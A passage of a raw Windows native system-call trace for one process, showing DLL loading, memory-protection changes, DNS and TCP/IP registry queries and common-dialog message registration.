 02347   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "SYSTEM\CurrentControlSet\Services\Tcpip\Linkage"}, ... 288, ) }, ... 288, ) == 0x0
 02348   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\"}, ... 292, ) }, ... 292, ) == 0x0
 02349   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces"}, ... 296, ) }, ... 296, ) == 0x0
 02350   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "SYSTEM\CurrentControlSet\Services\NetBT\Parameters"}, ... 300, ) }, ... 300, ) == 0x0
 02351   748   NtQueryDefaultLocale  (1, 1241520, ... ) == 0x0
 02352   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icmp.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02353   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "netapi32.dll"}, ... 304, ) }, ... 304, ) == 0x0
 02354   748   NtMapViewOfSection  (304, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x5b860000), 0x0, 344064, ) == 0x0
 02355   748   NtClose  (304, ... ) == 0x0
 02356   748   NtProtectVirtualMemory  (-1, (0x5b861000), 1168, 4, ... (0x5b861000), 4096, 32, ) == 0x0
 02357   748   NtProtectVirtualMemory  (-1, (0x5b861000), 4096, 32, ... (0x5b861000), 4096, 4, ) == 0x0
 02358   748   NtFlushInstructionCache  (-1, 1535512576, 1168, ... ) == 0x0
 02359   748   NtProtectVirtualMemory  (-1, (0x5b861000), 1168, 4, ... (0x5b861000), 4096, 32, ) == 0x0
 02360   748   NtProtectVirtualMemory  (-1, (0x5b861000), 4096, 32, ... (0x5b861000), 4096, 4, ) == 0x0
 02361   748   NtFlushInstructionCache  (-1, 1535512576, 1168, ... ) == 0x0
 02362   748   NtProtectVirtualMemory  (-1, (0x5b861000), 1168, 4, ... (0x5b861000), 4096, 32, ) == 0x0
 02363   748   NtProtectVirtualMemory  (-1, (0x5b861000), 4096, 32, ... (0x5b861000), 4096, 4, ) == 0x0
 02364   748   NtFlushInstructionCache  (-1, 1535512576, 1168, ... ) == 0x0
 02365   748   NtProtectVirtualMemory  (-1, (0x5b861000), 1168, 4, ... (0x5b861000), 4096, 32, ) == 0x0
 02366   748   NtProtectVirtualMemory  (-1, (0x5b861000), 4096, 32, ... (0x5b861000), 4096, 4, ) == 0x0
 02367   748   NtFlushInstructionCache  (-1, 1535512576, 1168, ... ) == 0x0
 02368   748   NtProtectVirtualMemory  (-1, (0x5b861000), 1168, 4, ... (0x5b861000), 4096, 32, ) == 0x0
 02369   748   NtProtectVirtualMemory  (-1, (0x5b861000), 4096, 32, ... (0x5b861000), 4096, 4, ) == 0x0
 02370   748   NtFlushInstructionCache  (-1, 1535512576, 1168, ... ) == 0x0
 02371   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netapi32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02372   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "dnsapi.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02373   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\dnsapi.dll"}, 1240360, ... ) }, 1240360, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02374   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\dnsapi.dll"}, 1240360, ... ) }, 1240360, ... ) == 0x0
 02375   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\dnsapi.dll"}, 5, 96, ... 304, {status=0x0, info=1}, ) }, 5, 96, ... 304, {status=0x0, info=1}, ) == 0x0
 02376   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 304, ... 308, ) == 0x0
 02377   748   NtQuerySection  (308, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 02378   748   NtClose  (304, ... ) == 0x0
 02379   748   NtMapViewOfSection  (308, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76f20000), 0x0, 159744, ) == 0x0
 02380   748   NtClose  (308, ... ) == 0x0
 02381   748   NtProtectVirtualMemory  (-1, (0x76f21000), 616, 4, ... (0x76f21000), 4096, 32, ) == 0x0
 02382   748   NtProtectVirtualMemory  (-1, (0x76f21000), 4096, 32, ... (0x76f21000), 4096, 4, ) == 0x0
 02383   748   NtFlushInstructionCache  (-1, 1995575296, 616, ... ) == 0x0
 02384   748   NtProtectVirtualMemory  (-1, (0x76f21000), 616, 4, ... (0x76f21000), 4096, 32, ) == 0x0
 02385   748   NtProtectVirtualMemory  (-1, (0x76f21000), 4096, 32, ... (0x76f21000), 4096, 4, ) == 0x0
 02386   748   NtFlushInstructionCache  (-1, 1995575296, 616, ... ) == 0x0
 02387   748   NtProtectVirtualMemory  (-1, (0x76f21000), 616, 4, ... (0x76f21000), 4096, 32, ) == 0x0
 02388   748   NtProtectVirtualMemory  (-1, (0x76f21000), 4096, 32, ... (0x76f21000), 4096, 4, ) == 0x0
 02389   748   NtFlushInstructionCache  (-1, 1995575296, 616, ... ) == 0x0
 02390   748   NtProtectVirtualMemory  (-1, (0x76f21000), 616, 4, ... (0x76f21000), 4096, 32, ) == 0x0
 02391   748   NtProtectVirtualMemory  (-1, (0x76f21000), 4096, 32, ... (0x76f21000), 4096, 4, ) == 0x0
 02392   748   NtFlushInstructionCache  (-1, 1995575296, 616, ... ) == 0x0
 02393   748   NtProtectVirtualMemory  (-1, (0x76f21000), 616, 4, ... (0x76f21000), 4096, 32, ) == 0x0
 02394   748   NtProtectVirtualMemory  (-1, (0x76f21000), 4096, 32, ... (0x76f21000), 4096, 4, ) == 0x0
 02395   748   NtFlushInstructionCache  (-1, 1995575296, 616, ... ) == 0x0
 02396   748   NtProtectVirtualMemory  (-1, (0x76f21000), 616, 4, ... (0x76f21000), 4096, 32, ) == 0x0
 02397   748   NtProtectVirtualMemory  (-1, (0x76f21000), 4096, 32, ... (0x76f21000), 4096, 4, ) == 0x0
 02398   748   NtFlushInstructionCache  (-1, 1995575296, 616, ... ) == 0x0
 02399   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dnsapi.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02400   748   NtCreateKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, 0, "Class", 0, ... 308, 2, ) }, 0,  (0x20019, {24, 16, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, 0, "Class", 0, ... 308, 2, ) , 0, ... 308, 2, ) == 0x0
 02401   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "System\CurrentControlSet\Services\DnsCache\Parameters"}, ... 304, ) }, ... 304, ) == 0x0
 02402   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "Software\Policies\Microsoft\Windows NT\DnsClient"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02403   748   NtQueryValueKey  (304,  (304, "QueryAdapterName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02404   748   NtQueryValueKey  (308,  (308, "DisableAdapterDomainName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02405   748   NtQueryValueKey  (304,  (304, "UseDomainNameDevolution", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02406   748   NtQueryValueKey  (308,  (308, "UseDomainNameDevolution", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (308, "UseDomainNameDevolution", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 02407   748   NtQueryValueKey  (304,  (304, "PrioritizeRecordData", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02408   748   NtQueryValueKey  (308,  (308, "PrioritizeRecordData", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (308, "PrioritizeRecordData", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 02409   748   NtQueryValueKey  (304,  (304, "AllowUnqualifiedQuery", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02410   748   NtQueryValueKey  (308,  (308, "AllowUnqualifiedQuery", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (308, "AllowUnqualifiedQuery", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 02411   748   NtQueryValueKey  (304,  (304, "AppendToMultiLabelName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02412   748   NtQueryValueKey  (304,  (304, "ScreenBadTlds", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02413   748   NtQueryValueKey  (304,  (304, "ScreenUnreachableServers", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02414   748   NtQueryValueKey  (304,  (304, "FilterClusterIp", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02415   748   NtQueryValueKey  (304,  (304, "WaitForNameErrorOnAll", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02416   748   NtQueryValueKey  (304,  (304, "UseEdns", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02417   748   NtQueryValueKey  (304,  (304, "QueryIpMatching", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02418   748   NtQueryValueKey  (304,  (304, "UseHostsFile", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02419   748   NtQueryValueKey  (304,  (304, "RegistrationEnabled", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02420   748   NtQueryValueKey  (308,  (308, "DisableDynamicUpdate", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02421   748   NtQueryValueKey  (304,  (304, "RegisterPrimaryName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02422   748   NtQueryValueKey  (304,  (304, "RegisterAdapterName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02423   748   NtQueryValueKey  (308,  (308, "EnableAdapterDomainNameRegistration", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02424   748   NtQueryValueKey  (304,  (304, "RegisterReverseLookup", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02425   748   NtQueryValueKey  (308,  (308, "DisableReverseAddressRegistrations", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (308, "DisableReverseAddressRegistrations", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 02426   748   NtQueryValueKey  (304,  (304, "RegisterWanAdapters", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02427   748   NtQueryValueKey  (308,  (308, "DisableWanDynamicUpdate", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02428   748   NtQueryValueKey  (304,  (304, "RegistrationTtl", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02429   748   NtQueryValueKey  (308,  (308, "DefaultRegistrationTTL", Partial, 144, ... TitleIdx=0, Type=4, Data="\24\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (308, "DefaultRegistrationTTL", Partial, 144, ... TitleIdx=0, Type=4, Data="\24\0\0\0"}, 16, ) }, 16, ) == 0x0
 02430   748   NtQueryValueKey  (304,  (304, "RegistrationRefreshInterval", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02431   748   NtQueryValueKey  (308,  (308, "DefaultRegistrationRefreshInterval", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02432   748   NtQueryValueKey  (304,  (304, "RegistrationMaxAddressCount", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02433   748   NtQueryValueKey  (308,  (308, "MaxNumberOfAddressesToRegister", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02434   748   NtQueryValueKey  (304,  (304, "UpdateSecurityLevel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02435   748   NtQueryValueKey  (308,  (308, "UpdateSecurityLevel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02436   748   NtQueryValueKey  (304,  (304, "UpdateZoneExcludeFile", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02437   748   NtQueryValueKey  (304,  (304, "UpdateTopLevelDomainZones", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02438   748   NtQueryValueKey  (304,  (304, "DnsTest", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02439   748   NtQueryValueKey  (304,  (304, "MaxCacheSize", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02440   748   NtQueryValueKey  (304,  (304, "MaxCacheTtl", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02441   748   NtQueryValueKey  (304,  (304, "MaxNegativeCacheTtl", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02442   748   NtQueryValueKey  (304,  (304, "AdapterTimeoutLimit", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02443   748   NtQueryValueKey  (304,  (304, "ServerPriorityTimeLimit", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02444   748   NtQueryValueKey  (304,  (304, "MaxCachedSockets", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02445   748   NtQueryValueKey  (304,  (304, "MulticastListenLevel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02446   748   NtQueryValueKey  (304,  (304, "MulticastSendLevel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02447   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "System\Setup"}, ... 312, ) }, ... 312, ) == 0x0
 02448   748   NtQueryValueKey  (312,  (312, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (312, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 02449   748   NtClose  (312, ... ) == 0x0
 02450   748   NtClose  (308, ... ) == 0x0
 02451   748   NtClose  (304, ... ) == 0x0
 02452   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "System\CurrentControlSet\Services\Tcpip\Parameters"}, ... 304, ) }, ... 304, ) == 0x0
 02453   748   NtQueryValueKey  (304,  (304, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) , Partial, 144, ... TitleIdx=0, Type=7, Data= (304, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) }, 64, ) == 0x0
 02454   748   NtQueryValueKey  (304,  (304, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) , Partial, 144, ... TitleIdx=0, Type=7, Data= (304, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) }, 64, ) == 0x0
 02455   748   NtQueryValueKey  (304,  (304, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) , Partial, 144, ... TitleIdx=0, Type=7, Data= (304, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) }, 64, ) == 0x0
 02456   748   NtQueryValueKey  (304,  (304, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) , Partial, 144, ... TitleIdx=0, Type=7, Data= (304, "DnsQueryTimeouts", Partial, 144, ... TitleIdx=0, Type=7, Data="1\0\0\0\0\0\0\02\0\0\0\0\0\0\02\0\0\0\0\0\0\04\0\0\0\0\0\0\08\0\0\0\0\0\0\00\0\0\0\0\0\0\0\0\0\0\0"}, 64, ) }, 64, ) == 0x0
 02457   748   NtQueryValueKey  (304,  (304, "DnsQuickQueryTimeouts", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02458   748   NtQueryValueKey  (304,  (304, "DnsMulticastQueryTimeouts", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02459   748   NtClose  (304, ... ) == 0x0
 02460   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "mpr.dll"}, ... 304, ) }, ... 304, ) == 0x0
 02461   748   NtMapViewOfSection  (304, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x71b20000), 0x0, 73728, ) == 0x0
 02462   748   NtClose  (304, ... ) == 0x0
 02463   748   NtProtectVirtualMemory  (-1, (0x71b21000), 440, 4, ... (0x71b21000), 4096, 32, ) == 0x0
 02464   748   NtProtectVirtualMemory  (-1, (0x71b21000), 4096, 32, ... (0x71b21000), 4096, 4, ) == 0x0
 02465   748   NtFlushInstructionCache  (-1, 1907494912, 440, ... ) == 0x0
 02466   748   NtProtectVirtualMemory  (-1, (0x71b21000), 440, 4, ... (0x71b21000), 4096, 32, ) == 0x0
 02467   748   NtProtectVirtualMemory  (-1, (0x71b21000), 4096, 32, ... (0x71b21000), 4096, 4, ) == 0x0
 02468   748   NtFlushInstructionCache  (-1, 1907494912, 440, ... ) == 0x0
 02469   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpr.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02470   748   NtCreateSemaphore  (0x1f0003, 0x0, 1, 1, ... 304, ) == 0x0
 02471   748   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 308, ) == 0x0
 02472   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "system\CurrentControlSet\control\NetworkProvider\HwOrder"}, ... 312, ) }, ... 312, ) == 0x0
 02473   748   NtNotifyChangeKey  (312, 308, 0, 0, 2011455960, 4, 0, 0, 0, 1, ... ) == 0x103
 02474   748   NtQueryInformationProcess  (-1, 28, 4, ... {process info, class 28, size 4}, 0x0, ) == 0x0
 02475   748   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 316, ) == 0x0
 02476   748   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 320, ) == 0x0
 02477   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "odbc32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02478   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\odbc32.dll"}, 1240360, ... ) }, 1240360, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02479   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\odbc32.dll"}, 1240360, ... ) }, 1240360, ... ) == 0x0
 02480   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\odbc32.dll"}, 5, 96, ... 324, {status=0x0, info=1}, ) }, 5, 96, ... 324, {status=0x0, info=1}, ) == 0x0
 02481   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 324, ... 328, ) == 0x0
 02482   748   NtQuerySection  (328, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 02483   748   NtClose  (324, ... ) == 0x0
 02484   748   NtMapViewOfSection  (328, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x74320000), 0x0, 249856, ) == 0x0
 02485   748   NtClose  (328, ... ) == 0x0
 02486   748   NtProtectVirtualMemory  (-1, (0x74321000), 840, 4, ... (0x74321000), 4096, 32, ) == 0x0
 02487   748   NtProtectVirtualMemory  (-1, (0x74321000), 4096, 32, ... (0x74321000), 4096, 4, ) == 0x0
 02488   748   NtFlushInstructionCache  (-1, 1949437952, 840, ... ) == 0x0
 02489   748   NtProtectVirtualMemory  (-1, (0x74321000), 840, 4, ... (0x74321000), 4096, 32, ) == 0x0
 02490   748   NtProtectVirtualMemory  (-1, (0x74321000), 4096, 32, ... (0x74321000), 4096, 4, ) == 0x0
 02491   748   NtFlushInstructionCache  (-1, 1949437952, 840, ... ) == 0x0
 02492   748   NtProtectVirtualMemory  (-1, (0x74321000), 840, 4, ... (0x74321000), 4096, 32, ) == 0x0
 02493   748   NtProtectVirtualMemory  (-1, (0x74321000), 4096, 32, ... (0x74321000), 4096, 4, ) == 0x0
 02494   748   NtFlushInstructionCache  (-1, 1949437952, 840, ... ) == 0x0
 02495   748   NtProtectVirtualMemory  (-1, (0x74321000), 840, 4, ... (0x74321000), 4096, 32, ) == 0x0
 02496   748   NtProtectVirtualMemory  (-1, (0x74321000), 4096, 32, ... (0x74321000), 4096, 4, ) == 0x0
 02497   748   NtFlushInstructionCache  (-1, 1949437952, 840, ... ) == 0x0
 02498   748   NtProtectVirtualMemory  (-1, (0x74321000), 840, 4, ... (0x74321000), 4096, 32, ) == 0x0
 02499   748   NtProtectVirtualMemory  (-1, (0x74321000), 4096, 32, ... (0x74321000), 4096, 4, ) == 0x0
 02500   748   NtFlushInstructionCache  (-1, 1949437952, 840, ... ) == 0x0
 02501   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "comdlg32.dll"}, ... 328, ) }, ... 328, ) == 0x0
 02502   748   NtMapViewOfSection  (328, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x763b0000), 0x0, 299008, ) == 0x0
 02503   748   NtClose  (328, ... ) == 0x0
 02504   748   NtProtectVirtualMemory  (-1, (0x763b1000), 1552, 4, ... (0x763b1000), 4096, 32, ) == 0x0
 02505   748   NtProtectVirtualMemory  (-1, (0x763b1000), 4096, 32, ... (0x763b1000), 4096, 4, ) == 0x0
 02506   748   NtFlushInstructionCache  (-1, 1983582208, 1552, ... ) == 0x0
 02507   748   NtProtectVirtualMemory  (-1, (0x763b1000), 1552, 4, ... (0x763b1000), 4096, 32, ) == 0x0
 02508   748   NtProtectVirtualMemory  (-1, (0x763b1000), 4096, 32, ... (0x763b1000), 4096, 4, ) == 0x0
 02509   748   NtFlushInstructionCache  (-1, 1983582208, 1552, ... ) == 0x0
 02510   748   NtProtectVirtualMemory  (-1, (0x763b1000), 1552, 4, ... (0x763b1000), 4096, 32, ) == 0x0
 02511   748   NtProtectVirtualMemory  (-1, (0x763b1000), 4096, 32, ... (0x763b1000), 4096, 4, ) == 0x0
 02512   748   NtFlushInstructionCache  (-1, 1983582208, 1552, ... ) == 0x0
 02513   748   NtProtectVirtualMemory  (-1, (0x763b1000), 1552, 4, ... (0x763b1000), 4096, 32, ) == 0x0
 02514   748   NtProtectVirtualMemory  (-1, (0x763b1000), 4096, 32, ... (0x763b1000), 4096, 4, ) == 0x0
 02515   748   NtFlushInstructionCache  (-1, 1983582208, 1552, ... ) == 0x0
 02516   748   NtProtectVirtualMemory  (-1, (0x763b1000), 1552, 4, ... (0x763b1000), 4096, 32, ) == 0x0
 02517   748   NtProtectVirtualMemory  (-1, (0x763b1000), 4096, 32, ... (0x763b1000), 4096, 4, ) == 0x0
 02518   748   NtFlushInstructionCache  (-1, 1983582208, 1552, ... ) == 0x0
 02519   748   NtProtectVirtualMemory  (-1, (0x763b1000), 1552, 4, ... (0x763b1000), 4096, 32, ) == 0x0
 02520   748   NtProtectVirtualMemory  (-1, (0x763b1000), 4096, 32, ... (0x763b1000), 4096, 4, ) == 0x0
 02521   748   NtFlushInstructionCache  (-1, 1983582208, 1552, ... ) == 0x0
 02522   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\comdlg32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02523   748   NtUserRegisterWindowMessage  ( ("WOWLFChange", ... ) , ... ) == 0xc06c
 02524   748   NtUserRegisterWindowMessage  ( ("WOWDirChange", ... ) , ... ) == 0xc06d
 02525   748   NtUserRegisterWindowMessage  ( ("WOWCHOOSEFONT_GETLOGFONT", ... ) , ... ) == 0xc06e
 02526   748   NtUserRegisterWindowMessage  ( ("commdlg_LBSelChangedNotify", ... ) , ... ) == 0xc06f
 02527   748   NtUserRegisterWindowMessage  ( ("commdlg_ShareViolation", ... ) , ... ) == 0xc070
 02528   748   NtUserRegisterWindowMessage  ( ("commdlg_FileNameOK", ... ) , ... ) == 0xc071
 02529   748   NtUserRegisterWindowMessage  ( ("commdlg_ColorOK", ... ) , ... ) == 0xc072
 02530   748   NtUserRegisterWindowMessage  ( ("commdlg_SetRGBColor", ... ) , ... ) == 0xc073
 02531   748   NtUserRegisterWindowMessage  ( ("commdlg_LBSelChangedNotify", ... ) , ... ) == 0xc06f
 02532   748   NtUserRegisterWindowMessage  ( ("commdlg_ShareViolation", ... ) , ... ) == 0xc070
 02533   748   NtUserRegisterWindowMessage  ( ("commdlg_FileNameOK", ... ) , ... ) == 0xc071
 02534   748   NtUserRegisterWindowMessage  ( ("commdlg_ColorOK", ... ) , ... ) == 0xc072
 02535   748   NtUserRegisterWindowMessage  ( ("commdlg_SetRGBColor", ... ) , ... ) == 0xc073
